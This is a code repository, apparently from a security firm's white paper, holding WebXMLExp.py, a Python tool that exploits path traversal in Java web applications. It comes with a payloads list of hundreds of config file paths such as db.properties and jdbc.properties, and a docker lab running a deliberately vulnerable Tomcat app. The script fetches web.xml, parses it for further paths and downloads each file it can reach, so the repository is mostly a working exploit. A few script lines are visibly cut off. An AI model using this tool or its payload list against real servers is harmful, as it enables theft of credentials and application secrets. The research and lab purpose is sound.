├── LICENSE.md ├── WebXMLExp.py ├── docker ├── docker-compose.yml └── vulnerable.war ├── payloads.txt ├── readme.md └── requirements.txt /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Invicti Security 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /WebXMLExp.py: -------------------------------------------------------------------------------- 1 | # 2 | # 888 888 888 Y88b d88P 888b d888 888 8888888888 3 | # 888 o 888 888 Y88b d88P 8888b d8888 888 888 4 | # 888 d8b 888 888 Y88o88P 88888b.d88888 888 888 5 | # 888 d888b 888 .d88b. 88888b. Y888P 888Y88888P888 888 8888888 888 888 88888b. 6 | # 888d88888b888 d8P Y8b 888 "88b d888b 888 Y888P 888 888 888 `Y8bd8P' 888 "88b 7 | # 88888P Y88888 88888888 888 888 d88888b 888 Y8P 888 888 888 X88K 888 888 8 | # 8888P Y8888 Y8b. 888 d88P d88P Y88b 888 " 888 888 888 .d8""8b. 888 d88P 9 | # 888P Y888 "Y8888 88888P" d88P Y88b 888 888 88888888 8888888888 888 888 88888P" 10 | # 888 11 | # 888 12 | # Copyright (c) 2022 Bogdan Calin (Invicti Security) 13 | # 14 | 15 | import requests, sys, string, random, hashlib, os, pathlib, urllib.parse 16 | import defusedxml.ElementTree as ET 17 | 18 | proxies = { 19 | # 'http': 'http://127.0.0.1:8080', 20 | # 'https': 'http://127.0.0.1:8080', 21 | } 22 | 23 | PAYLOAD_MARK = "" 24 | 25 | def sha256(input): 26 | return hashlib.sha256(input.encode()).hexdigest() 27 | 28 | def randomStr(count): 29 | return ''.join(random.choices(string.ascii_lowercase, k=count)) 30 | 31 | def getCustom404(orig_url): 32 | try: 33 | payload = "WEB-{0}/{1}.xml".format(randomStr(3).upper(), randomStr(5)) 34 | url = orig_url.replace(PAYLOAD_MARK, payload) 35 | resp = requests.get(url, proxies=proxies) 36 | body = resp.text.replace(payload, "*").replace(urllib.parse.quote(payload), '*') 37 | return (resp.status_code, sha256(body)) 38 | except BaseException as e: 39 | print("unable to determine custom404. maybe the URL is not valid? " + str(e)) 40 | return False 41 | 42 | def testPayload(orig_url, payload, custom404): 43 | url = orig_url.replace(PAYLOAD_MARK, payload) 44 | resp = requests.get(url, proxies=proxies) 45 | body = resp.text.replace(payload, "*").replace(urllib.parse.quote(payload), '*') 46 | if resp.status_code != custom404[0] or resp.status_code == custom404[0] and sha256(body) != custom404[1]: 47 | return resp 48 | else: 49 | return False 50 | 51 | def urlIsValid(orig_url, c404): 52 | p = testPayload(orig_url, "WEB-INF/web.xml", c404) 53 | if p and " 0: 92 | for v in values: 93 | if v not in payloads: 94 | payloads.append(v) 95 | if elem.tag.endswith("servlet-class"): 96 | path = extractPathFromClassName(elem.text, "WEB-INF") 97 | if path not in payloads: 98 | payloads.append(path) 99 | path2 = extractPathFromClassName(elem.text, "BOOT-INF") 100 | if path2 not in payloads: 101 | payloads.append(path2) 102 | if elem.tag.endswith("servlet-name"): 103 | path = "WEB-INF/{}-servlet.xml".format(elem.text) 104 | if path not in payloads: 105 | payloads.append(path) 106 | path = "WEB-INF/{}.properties".format(elem.text) 107 | if path not in payloads: 108 | payloads.append(path) 109 | path = "WEB-INF/{}-config.xml".format(elem.text) 110 | if path not in payloads: 111 | payloads.append(path) 112 | path = "WEB-INF/{}-config.yml".format(elem.text) 113 | if path not in payloads: 114 | payloads.append(path) 115 | path = "WEB-INF/{}-config.yaml".format(elem.text) 116 | if path not in payloads: 117 | payloads.append(path) 118 | path = "WEB-INF/classes/{}.properties".format(elem.text) 119 | if path not in payloads: 120 | payloads.append(path) 121 | path = "WEB-INF/{}.yml".format(elem.text) 122 | if path not in payloads: 123 | payloads.append(path) 124 | path = "WEB-INF/{}.yaml".format(elem.text) 125 | if path not in payloads: 126 | payloads.append(path) 127 | 128 | except: 129 | pass 130 | 131 | return payloads 132 | 133 | def saveResponse(response, payload): 134 | if payload.startswith("/"): 135 | payload = payload[1:] 136 | 137 | path = os.path.join(os.getcwd(), "results", payload).replace("\\","/") 138 | 139 | safe_dir = os.getcwd() 140 | if os.path.commonprefix((os.path.realpath(path),safe_dir)) != safe_dir: 141 | print(f"Not writing results for invalid path \"{path}\" (hack not the hacker)") 142 | return 143 | 144 | print(" saving response to {}".format(path)) 145 | 146 | p = pathlib.Path(path) 147 | if not os.path.exists(p.parent): 148 | os.makedirs(p.parent) 149 | 150 | f = open(path, "w+", encoding='utf-8') 151 | f.write(response.text) 152 | f.close() 153 | 154 | def exploit(url, payloads): 155 | orig_url = url.replace("WEB-INF/web.xml", PAYLOAD_MARK) 156 | print("determine custom 404 ...") 157 | c404 = getCustom404(orig_url) 158 | 159 | if not c404: 160 | sys.exit() 161 | 162 | print("testing the exploit url ...") 163 | if not urlIsValid(orig_url, c404): 164 | print("exploit url is not valid! cannot find ' 0 and iterations < 5: 171 | iterations += 1 172 | print("testing {} payloads ...".format(len(payloads))) 173 | for payload in payloads: 174 | payloads.remove(payload) 175 | if payload not in processed_payloads: 176 | processed_payloads.append(payload) 177 | p = testPayload(orig_url, payload, c404) 178 | if p: 179 | q = testPayload(orig_url, randomStr(5) + payload, c404) 180 | if not q: 181 | z = testPayload(orig_url, payload + randomStr(5), c404) 182 | if not z: 183 | p = testPayload(orig_url, payload, c404) 184 | if p: 185 | print("> {0}".format(p.url)) 186 | saveResponse(p, payload) 187 | new_payloads = extractNewPayloadsFromResponse(p.text) 188 | if len(new_payloads) > 0: 189 | for np in new_payloads: 190 | if np not in processed_payloads and np not in payloads: 191 | payloads.append(np) 192 | 193 | # main() 194 | if __name__ == '__main__': 195 | if len(sys.argv) < 2: 196 | print("usage: python WebXMLExp.py ") 197 | print('example: python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"') 198 | print(' python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename="') 199 | sys.exit() 200 | 201 | url = sys.argv[1].strip() 202 | if url: 203 | # read payloads.txt 204 | payloads = [] 205 | with open("payloads.txt") as f: 206 | for line in f: 207 | line = line.strip() 208 | if line and line not in payloads: 209 | payloads.append(line) 210 | 211 | exploit(url, payloads) -------------------------------------------------------------------------------- /docker/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | services: 3 | vulnerable_web: 4 | image: tomcat:10.0 5 | volumes: 6 | - ./vulnerable.war:/usr/local/tomcat/webapps/vulnerable.war 7 | ports: 8 | - '8082:8080' 9 | -------------------------------------------------------------------------------- /docker/vulnerable.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Invicti-Security/web-inf-path-trav/c27ad7e68a154d991f5b4ed67ec19acaa35a41d9/docker/vulnerable.war -------------------------------------------------------------------------------- /payloads.txt: -------------------------------------------------------------------------------- 1 | WEB-INF/web.xml 2 | WEB-INF/jboss-web.xml 3 | WEB-INF/glassfish-web.xml 4 | WEB-INF/glassfish-resources.xml 5 | index.jsp 6 | login.jsp 7 | home.jsp 8 | redirect.jsp 9 | build.gradle 10 | application.properties 11 | config.json 12 | config/config.json 13 | default.properties 14 | app.properties 15 | db.properties 16 | database.properties 17 | dev.properties 18 | config.properties 19 | datasource.properties 20 | struts.properties 21 | log4j.properties 22 | ESAPI.properties 23 | user.properties 24 | app-default.properties 25 | classes/app.properties 26 | web-application-context.xml 27 | monitor-context.xml 28 | kpi-all.xml 29 | monitor-auth.properties 30 | web-mvc-context.xml 31 | WEB-INF/application-client.xml 32 | WEB-INF/application_config.xml 33 | WEB-INF/cas-servlet.xml 34 | WEB-INF/cas.properties 35 | WEB-INF/classes/app-config.xml 36 | WEB-INF/classes/application.yml 37 | WEB-INF/classes/applicationContext.xml 38 | WEB-INF/classes/cas-theme-default.properties 39 | WEB-INF/classes/commons-logging.properties 40 | WEB-INF/classes/config.properties 41 | WEB-INF/classes/countries.properties 42 | WEB-INF/classes/db.properties 43 | WEB-INF/classes/default-theme.properties 44 | WEB-INF/classes/default_views.properties 45 | WEB-INF/classes/demo.xml 46 | WEB-INF/classes/faces-config.xml 47 | WEB-INF/classes/fckeditor.properties 48 | WEB-INF/classes/hibernate.cfg.xml 49 | WEB-INF/classes/languages.xml 50 | WEB-INF/classes/log4j.properties 51 | WEB-INF/classes/logback.xml 52 | WEB-INF/classes/messages.properties 53 | WEB-INF/classes/META-INF/app-config.xml 54 | WEB-INF/classes/META-INF/persistence.xml 55 | WEB-INF/classes/mobile.xml 56 | WEB-INF/classes/persistence.xml 57 | WEB-INF/classes/protocol_views.properties 58 | WEB-INF/classes/resources/config.properties 59 | WEB-INF/classes/services.properties 60 | WEB-INF/classes/struts-default.vm 61 | WEB-INF/classes/struts.properties 62 | WEB-INF/classes/struts.xml 63 | WEB-INF/classes/theme.properties 64 | WEB-INF/classes/validation.properties 65 | WEB-INF/classes/velocity.properties 66 | WEB-INF/classes/web.xml 67 | WEB-INF/components.xml 68 | WEB-INF/conf/caches.dat 69 | WEB-INF/conf/caches.properties 70 | WEB-INF/conf/core.xml 71 | WEB-INF/conf/core_context.xml 72 | WEB-INF/conf/daemons.properties 73 | WEB-INF/conf/editors.properties 74 | WEB-INF/conf/jpa_context.xml 75 | WEB-INF/conf/jtidy.properties 76 | WEB-INF/conf/lutece.properties 77 | WEB-INF/conf/mime.types 78 | WEB-INF/conf/page_navigator.xml 79 | WEB-INF/conf/search.properties 80 | WEB-INF/conf/webmaster.properties 81 | WEB-INF/conf/wml.properties 82 | WEB-INF/config.xml 83 | WEB-INF/config/dashboard-statistics.xml 84 | WEB-INF/config/faces-config.xml 85 | WEB-INF/config/metadata.xml 86 | WEB-INF/config/mua-endpoints.xml 87 | WEB-INF/config/security.xml 88 | WEB-INF/config/soapConfig.xml 89 | WEB-INF/config/users.xml 90 | WEB-INF/config/web-core.xml 91 | WEB-INF/config/webflow-config.xml 92 | WEB-INF/config/webmvc-config.xml 93 | WEB-INF/decorators.xml 94 | WEB-INF/deployerConfigContext.xml 95 | WEB-INF/ejb-jar.xml 96 | WEB-INF/faces-config.xml 97 | WEB-INF/hibernate.cfg.xml 98 | WEB-INF/ias-web.xml 99 | WEB-INF/jax-ws-catalog.xml 100 | WEB-INF/jboss-client.xml 101 | WEB-INF/jboss-ejb-client.xml 102 | WEB-INF/jboss-ejb3.xml 103 | WEB-INF/jboss-webservices.xml 104 | WEB-INF/jetty-env.xml 105 | WEB-INF/jetty-web.xml 106 | WEB-INF/jrun-web.xml 107 | WEB-INF/local-jps.properties 108 | WEB-INF/local.xml 109 | WEB-INF/logback.xml 110 | WEB-INF/logs/log.log 111 | WEB-INF/openx-config.xml 112 | WEB-INF/portlet.xml 113 | WEB-INF/quartz-properties.xml 114 | WEB-INF/resources/config.properties 115 | WEB-INF/restlet-servlet.xml 116 | WEB-INF/service.xsd 117 | WEB-INF/sitemesh.xml 118 | WEB-INF/spring-config.xml 119 | WEB-INF/spring-config/application-context.xml 120 | WEB-INF/spring-config/authorization-config.xml 121 | WEB-INF/spring-config/management-config.xml 122 | WEB-INF/spring-config/messaging-config.xml 123 | WEB-INF/spring-config/presentation-config.xml 124 | WEB-INF/spring-config/services-config.xml 125 | WEB-INF/spring-config/services-remote-config.xml 126 | WEB-INF/spring-configuration/filters.xml 127 | WEB-INF/spring-context.xml 128 | WEB-INF/spring-dispatcher-servlet.xml 129 | WEB-INF/spring-mvc.xml 130 | WEB-INF/spring-ws-servlet.xml 131 | WEB-INF/spring/webmvc-config.xml 132 | WEB-INF/springweb-servlet.xml 133 | WEB-INF/struts-config-widgets.xml 134 | WEB-INF/sun-jaxws.xml 135 | WEB-INF/tjc-web.xml 136 | WEB-INF/trinidad-config.xml 137 | WEB-INF/validation.xml 138 | WEB-INF/validator-rules.xml 139 | WEB-INF/web-jetty.xml 140 | WEB-INF/web.xml.jsf 141 | WEB-INF/web2.xml 142 | WEB-INF/workflow-properties.xml 143 | WEB-INF/web-application-context.xml 144 | WEB-INF/monitor-context.xml 145 | WEB-INF/kpi-all.xml 146 | WEB-INF/monitor-auth.properties 147 | WEB-INF/web-mvc-context.xml 148 | WEB-INF/config/web-application-context.xml 149 | WEB-INF/config/monitor-context.xml 150 | WEB-INF/config/kpi-all.xml 151 | WEB-INF/config/monitor-auth.properties 152 | WEB-INF/config/web-mvc-context.xml 153 | WEB-INF/classes/web-application-context.xml 154 | WEB-INF/classes/monitor-context.xml 155 | WEB-INF/classes/kpi-all.xml 156 | WEB-INF/classes/monitor-auth.properties 157 | WEB-INF/classes/web-mvc-context.xml 158 | WEB-INF/lib/web-application-context.xml 159 | WEB-INF/lib/monitor-context.xml 160 | WEB-INF/lib/kpi-all.xml 161 | WEB-INF/lib/monitor-auth.properties 162 | WEB-INF/lib/web-mvc-context.xml 163 | WEB-INF/dispatcher-servlet.xml 164 | WEB-INF/beans.xml 165 | WEB-INF/views/index.jsp 166 | WEB-INF/views/home.jsp 167 | WEB-INF/views/login.jsp 168 | WEB-INF/spring/root-context.xml 169 | WEB-INF/spring/appServlet/servlet-context.xml 170 | WEB-INF/spring/context-root.xml 171 | WEB-INF/spring/context-mybatis.xml 172 | WEB-INF/lms.properties 173 | WEB-INF/application.properties 174 | WEB-INF/applicationContext.xml 175 | WEB-INF/applicationSecurity.xml 176 | WEB-INF/default.properties 177 | WEB-INF/jdbc.properties 178 | WEB-INF/db.properties 179 | WEB-INF/classes/mybatis-config.xml 180 | WEB-INF/classes/log4j.xml 181 | WEB-INF/classes/jdbc.properties 182 | WEB-INF/classes/application.properties 183 | WEB-INF/classes/springmvc.xml 184 | WEB-INF/classes/applicationContext_mapper.xml 185 | WEB-INF/classes/applicationContext_service.xml 186 | WEB-INF/geronimo-web.xml 187 | WEB-INF/ibm-web-bnd.xmi 188 | WEB-INF/ibm-web-ext.xmi 189 | WEB-INF/jboss-deployment-structure.xml 190 | WEB-INF/jboss-web.xml.5 191 | WEB-INF/jonas-web.xml 192 | WEB-INF/liferay-display.xml 193 | WEB-INF/liferay-layout-templates.xml 194 | WEB-INF/liferay-look-and-feel.xml 195 | WEB-INF/liferay-plugin-package.xml 196 | WEB-INF/liferay-portlet.xml 197 | WEB-INF/liferay-social.xml 198 | WEB-INF/liferay-web.xml 199 | WEB-INF/portlet-custom.xml 200 | WEB-INF/remoting-servlet.xml 201 | WEB-INF/resin-web.xml 202 | WEB-INF/rexip-web.xml 203 | WEB-INF/server-config.wsdd 204 | WEB-INF/struts-config-ext.xml 205 | WEB-INF/struts-config.xml 206 | WEB-INF/sun-web.xml 207 | WEB-INF/tiles-defs.xml 208 | WEB-INF/urlrewrite.xml 209 | WEB-INF/web-borland.xml 210 | WEB-INF/weblogic.xml 211 | WEB-INF/config.json 212 | WEB-INF/app.json 213 | WEB-INF/config/config.json 214 | WEB-INF/config/app.json 215 | WEB-INF/config/app.properties 216 | WEB-INF/config/default.properties 217 | WEB-INF/config/db.properties 218 | WEB-INF/config/database.properties 219 | WEB-INF/config/dev.properties 220 | WEB-INF/config/config.properties 221 | WEB-INF/config/datasource.properties 222 | WEB-INF/config/log4j.properties 223 | WEB-INF/config/ESAPI.properties 224 | WEB-INF/config/user.properties 225 | WEB-INF/config/struts.properties 226 | WEB-INF/config/app-default.properties 227 | WEB-INF/configs/app.properties 228 | WEB-INF/configs/default.properties 229 | WEB-INF/configs/db.properties 230 | WEB-INF/configs/database.properties 231 | WEB-INF/configs/dev.properties 232 | WEB-INF/configs/config.properties 233 | WEB-INF/configs/datasource.properties 234 | WEB-INF/configs/log4j.properties 235 | WEB-INF/configs/ESAPI.properties 236 | WEB-INF/configs/user.properties 237 | WEB-INF/configs/struts.properties 238 | WEB-INF/configs/app-default.properties 239 | WEB-INF/conf/app.properties 240 | WEB-INF/conf/default.properties 241 | WEB-INF/conf/db.properties 242 | WEB-INF/conf/database.properties 243 | WEB-INF/conf/dev.properties 244 | WEB-INF/conf/config.properties 245 | WEB-INF/conf/datasource.properties 246 | WEB-INF/conf/log4j.properties 247 | WEB-INF/conf/ESAPI.properties 248 | WEB-INF/conf/user.properties 249 | WEB-INF/conf/app-default.properties 250 | WEB-INF/conf/struts.properties 251 | META-INF/context.xml 252 | META-INF/app-config.xml 253 | META-INF/application-client.xml 254 | META-INF/application.xml 255 | META-INF/beans.xml 256 | META-INF/CERT.SF 257 | META-INF/container.xml 258 | META-INF/eclipse.inf 259 | META-INF/ejb-jar.xml 260 | META-INF/ironjacamar.xml 261 | META-INF/jboss-app.xml 262 | META-INF/jboss-client.xml 263 | META-INF/jboss-deployment-structure.xml 264 | META-INF/jboss-ejb-client.xml 265 | META-INF/jboss-ejb3.xml 266 | META-INF/jboss-webservices.xml 267 | META-INF/jbosscmp-jdbc.xml 268 | META-INF/MANIFEST.MF 269 | META-INF/openwebbeans/openwebbeans.properties 270 | META-INF/persistence.xml 271 | META-INF/ra.xml 272 | META-INF/SOFTWARE.SF 273 | META-INF/spring/application-context.xml 274 | META-INF/weblogic-application.xml 275 | META-INF/weblogic-ejb-jar.xml 276 | JNLP-INF/APPLICATION.JNLP 277 | web-application-context.yml 278 | web-mvc-context.yml 279 | WEB-INF/application-client.yml 280 | WEB-INF/application_config.yml 281 | WEB-INF/classes/app-config.yml 282 | WEB-INF/classes/applicationContext.yml 283 | web-application-context.yaml 284 | web-mvc-context.yaml 285 | WEB-INF/application-client.yaml 286 | WEB-INF/application_config.yaml 287 | WEB-INF/classes/app-config.yaml 288 | WEB-INF/classes/application.yaml 289 | WEB-INF/classes/applicationContext.yaml 290 | WEB-INF/spring/root-context.yaml 291 | WEB-INF/spring/appServlet/servlet-context.yaml 292 | WEB-INF/spring/context-root.yaml 293 | WEB-INF/spring/context-mybatis.yaml 294 | WEB-INF/spring/root-context.yml 295 | WEB-INF/spring/appServlet/servlet-context.yml 296 | WEB-INF/spring/context-root.yml 297 | WEB-INF/spring/context-mybatis.yml 298 | BOOT-INF/application-client.xml 299 | BOOT-INF/application_config.xml 300 | BOOT-INF/cas-servlet.xml 301 | BOOT-INF/cas.properties 302 | BOOT-INF/classes/app-config.xml 303 | BOOT-INF/classes/application.yml 304 | BOOT-INF/classes/applicationContext.xml 305 | BOOT-INF/classes/cas-theme-default.properties 306 | BOOT-INF/classes/commons-logging.properties 307 | BOOT-INF/classes/config.properties 308 | BOOT-INF/classes/countries.properties 309 | BOOT-INF/classes/db.properties 310 | BOOT-INF/classes/default-theme.properties 311 | BOOT-INF/classes/default_views.properties 312 | BOOT-INF/classes/demo.xml 313 | BOOT-INF/classes/faces-config.xml 314 | BOOT-INF/classes/fckeditor.properties 315 | BOOT-INF/classes/hibernate.cfg.xml 316 | BOOT-INF/classes/languages.xml 317 | BOOT-INF/classes/log4j.properties 318 | BOOT-INF/classes/logback.xml 319 | BOOT-INF/classes/messages.properties 320 | BOOT-INF/classes/META-INF/app-config.xml 321 | BOOT-INF/classes/META-INF/persistence.xml 322 | BOOT-INF/classes/mobile.xml 323 | BOOT-INF/classes/persistence.xml 324 | BOOT-INF/classes/protocol_views.properties 325 | BOOT-INF/classes/resources/config.properties 326 | BOOT-INF/classes/services.properties 327 | BOOT-INF/classes/struts-default.vm 328 | BOOT-INF/classes/struts.properties 329 | BOOT-INF/classes/struts.xml 330 | BOOT-INF/classes/theme.properties 331 | BOOT-INF/classes/validation.properties 332 | BOOT-INF/classes/velocity.properties 333 | BOOT-INF/classes/web.xml 334 | BOOT-INF/components.xml 335 | BOOT-INF/conf/caches.dat 336 | BOOT-INF/conf/caches.properties 337 | BOOT-INF/conf/core.xml 338 | BOOT-INF/conf/core_context.xml 339 | BOOT-INF/conf/daemons.properties 340 | BOOT-INF/conf/editors.properties 341 | BOOT-INF/conf/jpa_context.xml 342 | BOOT-INF/conf/jtidy.properties 343 | BOOT-INF/conf/lutece.properties 344 | BOOT-INF/conf/mime.types 345 | BOOT-INF/conf/page_navigator.xml 346 | BOOT-INF/conf/search.properties 347 | BOOT-INF/conf/webmaster.properties 348 | BOOT-INF/conf/wml.properties 349 | BOOT-INF/config.xml 350 | BOOT-INF/config/dashboard-statistics.xml 351 | BOOT-INF/config/faces-config.xml 352 | BOOT-INF/config/metadata.xml 353 | BOOT-INF/config/mua-endpoints.xml 354 | BOOT-INF/config/security.xml 355 | BOOT-INF/config/soapConfig.xml 356 | BOOT-INF/config/users.xml 357 | BOOT-INF/config/web-core.xml 358 | BOOT-INF/config/webflow-config.xml 359 | BOOT-INF/config/webmvc-config.xml 360 | BOOT-INF/decorators.xml 361 | BOOT-INF/deployerConfigContext.xml 362 | BOOT-INF/ejb-jar.xml 363 | BOOT-INF/faces-config.xml 364 | BOOT-INF/hibernate.cfg.xml 365 | BOOT-INF/ias-web.xml 366 | BOOT-INF/jax-ws-catalog.xml 367 | BOOT-INF/jboss-client.xml 368 | BOOT-INF/jboss-ejb-client.xml 369 | BOOT-INF/jboss-ejb3.xml 370 | BOOT-INF/jboss-webservices.xml 371 | BOOT-INF/jetty-env.xml 372 | BOOT-INF/jetty-web.xml 373 | BOOT-INF/jrun-web.xml 374 | BOOT-INF/local-jps.properties 375 | BOOT-INF/local.xml 376 | BOOT-INF/logback.xml 377 | BOOT-INF/logs/log.log 378 | BOOT-INF/openx-config.xml 379 | BOOT-INF/portlet.xml 380 | BOOT-INF/quartz-properties.xml 381 | BOOT-INF/resources/config.properties 382 | BOOT-INF/restlet-servlet.xml 383 | BOOT-INF/service.xsd 384 | BOOT-INF/sitemesh.xml 385 | BOOT-INF/spring-config.xml 386 | BOOT-INF/spring-config/application-context.xml 387 | BOOT-INF/spring-config/authorization-config.xml 388 | BOOT-INF/spring-config/management-config.xml 389 | BOOT-INF/spring-config/messaging-config.xml 390 | BOOT-INF/spring-config/presentation-config.xml 391 | BOOT-INF/spring-config/services-config.xml 392 | BOOT-INF/spring-config/services-remote-config.xml 393 | BOOT-INF/spring-configuration/filters.xml 394 | BOOT-INF/spring-context.xml 395 | BOOT-INF/spring-dispatcher-servlet.xml 396 | BOOT-INF/spring-mvc.xml 397 | BOOT-INF/spring-ws-servlet.xml 398 | BOOT-INF/spring/webmvc-config.xml 399 | BOOT-INF/springweb-servlet.xml 400 | BOOT-INF/struts-config-widgets.xml 401 | BOOT-INF/sun-jaxws.xml 402 | BOOT-INF/tjc-web.xml 403 | BOOT-INF/trinidad-config.xml 404 | BOOT-INF/validation.xml 405 | BOOT-INF/validator-rules.xml 406 | BOOT-INF/web-jetty.xml 407 | BOOT-INF/web.xml.jsf 408 | BOOT-INF/web2.xml 409 | BOOT-INF/workflow-properties.xml 410 | BOOT-INF/web-application-context.xml 411 | BOOT-INF/monitor-context.xml 412 | BOOT-INF/kpi-all.xml 413 | BOOT-INF/monitor-auth.properties 414 | BOOT-INF/web-mvc-context.xml 415 | BOOT-INF/config/web-application-context.xml 416 | BOOT-INF/config/monitor-context.xml 417 | BOOT-INF/config/kpi-all.xml 418 | BOOT-INF/config/monitor-auth.properties 419 | BOOT-INF/config/web-mvc-context.xml 420 | BOOT-INF/classes/web-application-context.xml 421 | BOOT-INF/classes/monitor-context.xml 422 | BOOT-INF/classes/kpi-all.xml 423 | BOOT-INF/classes/monitor-auth.properties 424 | BOOT-INF/classes/web-mvc-context.xml 425 | BOOT-INF/lib/web-application-context.xml 426 | BOOT-INF/lib/monitor-context.xml 427 | BOOT-INF/lib/kpi-all.xml 428 | BOOT-INF/lib/monitor-auth.properties 429 | BOOT-INF/lib/web-mvc-context.xml 430 | BOOT-INF/dispatcher-servlet.xml 431 | BOOT-INF/beans.xml 432 | BOOT-INF/views/index.jsp 433 | BOOT-INF/views/home.jsp 434 | BOOT-INF/views/login.jsp 435 | BOOT-INF/spring/root-context.xml 436 | BOOT-INF/spring/appServlet/servlet-context.xml 437 | BOOT-INF/spring/context-root.xml 438 | BOOT-INF/spring/context-mybatis.xml 439 | BOOT-INF/lms.properties 440 | BOOT-INF/application.properties 441 | BOOT-INF/applicationContext.xml 442 | BOOT-INF/applicationSecurity.xml 443 | BOOT-INF/default.properties 444 | BOOT-INF/jdbc.properties 445 | BOOT-INF/db.properties 446 | BOOT-INF/classes/mybatis-config.xml 447 | BOOT-INF/classes/log4j.xml 448 | BOOT-INF/classes/jdbc.properties 449 | BOOT-INF/classes/application.properties 450 | BOOT-INF/classes/springmvc.xml 451 | BOOT-INF/classes/applicationContext_mapper.xml 452 | BOOT-INF/classes/applicationContext_service.xml 453 | BOOT-INF/geronimo-web.xml 454 | BOOT-INF/ibm-web-bnd.xmi 455 | BOOT-INF/ibm-web-ext.xmi 456 | BOOT-INF/jboss-deployment-structure.xml 457 | BOOT-INF/jboss-web.xml.5 458 | BOOT-INF/jonas-web.xml 459 | BOOT-INF/liferay-display.xml 460 | BOOT-INF/liferay-layout-templates.xml 461 | BOOT-INF/liferay-look-and-feel.xml 462 | BOOT-INF/liferay-plugin-package.xml 463 | BOOT-INF/liferay-portlet.xml 464 | BOOT-INF/liferay-social.xml 465 | BOOT-INF/liferay-web.xml 466 | BOOT-INF/portlet-custom.xml 467 | BOOT-INF/remoting-servlet.xml 468 | BOOT-INF/resin-web.xml 469 | BOOT-INF/rexip-web.xml 470 | BOOT-INF/server-config.wsdd 471 | BOOT-INF/struts-config-ext.xml 472 | BOOT-INF/struts-config.xml 473 | BOOT-INF/sun-web.xml 474 | BOOT-INF/tiles-defs.xml 475 | BOOT-INF/urlrewrite.xml 476 | BOOT-INF/web-borland.xml 477 | BOOT-INF/weblogic.xml 478 | BOOT-INF/config.json 479 | BOOT-INF/app.json 480 | BOOT-INF/config/config.json 481 | BOOT-INF/config/app.json 482 | BOOT-INF/config/app.properties 483 | BOOT-INF/config/default.properties 484 | BOOT-INF/config/db.properties 485 | BOOT-INF/config/database.properties 486 | BOOT-INF/config/dev.properties 487 | BOOT-INF/config/config.properties 488 | BOOT-INF/config/datasource.properties 489 | BOOT-INF/config/log4j.properties 490 | BOOT-INF/config/ESAPI.properties 491 | BOOT-INF/config/user.properties 492 | BOOT-INF/config/struts.properties 493 | BOOT-INF/config/app-default.properties 494 | BOOT-INF/configs/app.properties 495 | BOOT-INF/configs/default.properties 496 | BOOT-INF/configs/db.properties 497 | BOOT-INF/configs/database.properties 498 | BOOT-INF/configs/dev.properties 499 | BOOT-INF/configs/config.properties 500 | BOOT-INF/configs/datasource.properties 501 | BOOT-INF/configs/log4j.properties 502 | BOOT-INF/configs/ESAPI.properties 503 | BOOT-INF/configs/user.properties 504 | BOOT-INF/configs/struts.properties 505 | BOOT-INF/configs/app-default.properties 506 | BOOT-INF/conf/app.properties 507 | BOOT-INF/conf/default.properties 508 | BOOT-INF/conf/db.properties 509 | BOOT-INF/conf/database.properties 510 | BOOT-INF/conf/dev.properties 511 | BOOT-INF/conf/config.properties 512 | BOOT-INF/conf/datasource.properties 513 | BOOT-INF/conf/log4j.properties 514 | BOOT-INF/conf/ESAPI.properties 515 | BOOT-INF/conf/user.properties 516 | BOOT-INF/conf/app-default.properties 517 | BOOT-INF/conf/struts.properties -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | ### WebXMLExp.py 2 | 3 | Tool for helping in the exploitation of path traversal vulnerabilities in Java web applications. 4 | 5 | This tool is referenced in the Invicti Security white paper [Exploiting path traversal vulnerabilities in Java web applications](https://www.invicti.com/white-papers/exploiting-path-traversal-vulnerabilities-java-web-applications-technical-paper/). 6 | 7 | ## Install 8 | 9 | Python3 is required for this tool. 10 | 11 | Run the following command: 12 | ``` 13 | pip install -r requirements.txt 14 | ``` 15 | ## Usage: 16 | 17 | After installation provide an exploit URL like so: 18 | ``` 19 | usage: python WebXMLExp.py 20 | ``` 21 | 22 | The results (files that were downloaded) are available in the **results** folder. 23 | 24 | ### Examples 25 | 26 | ``` 27 | python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml" 28 | python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=" 29 | ``` 30 | 31 | ## Vulnerable web application docker image 32 | 33 | A web application vulnerable to a path traversal vulnerability is provided in the **docker** folder. 34 | 35 | To start, enter into the **docker** folder and run: 36 | 37 | ``` 38 | docker-compose up 39 | ``` 40 | 41 | The application is accessible at **http://127.0.0.1:8082/vulnerable/**. 42 | 43 | To exploit the the path traversal vulnerability visit: 44 | http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml 45 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | defusedxml --------------------------------------------------------------------------------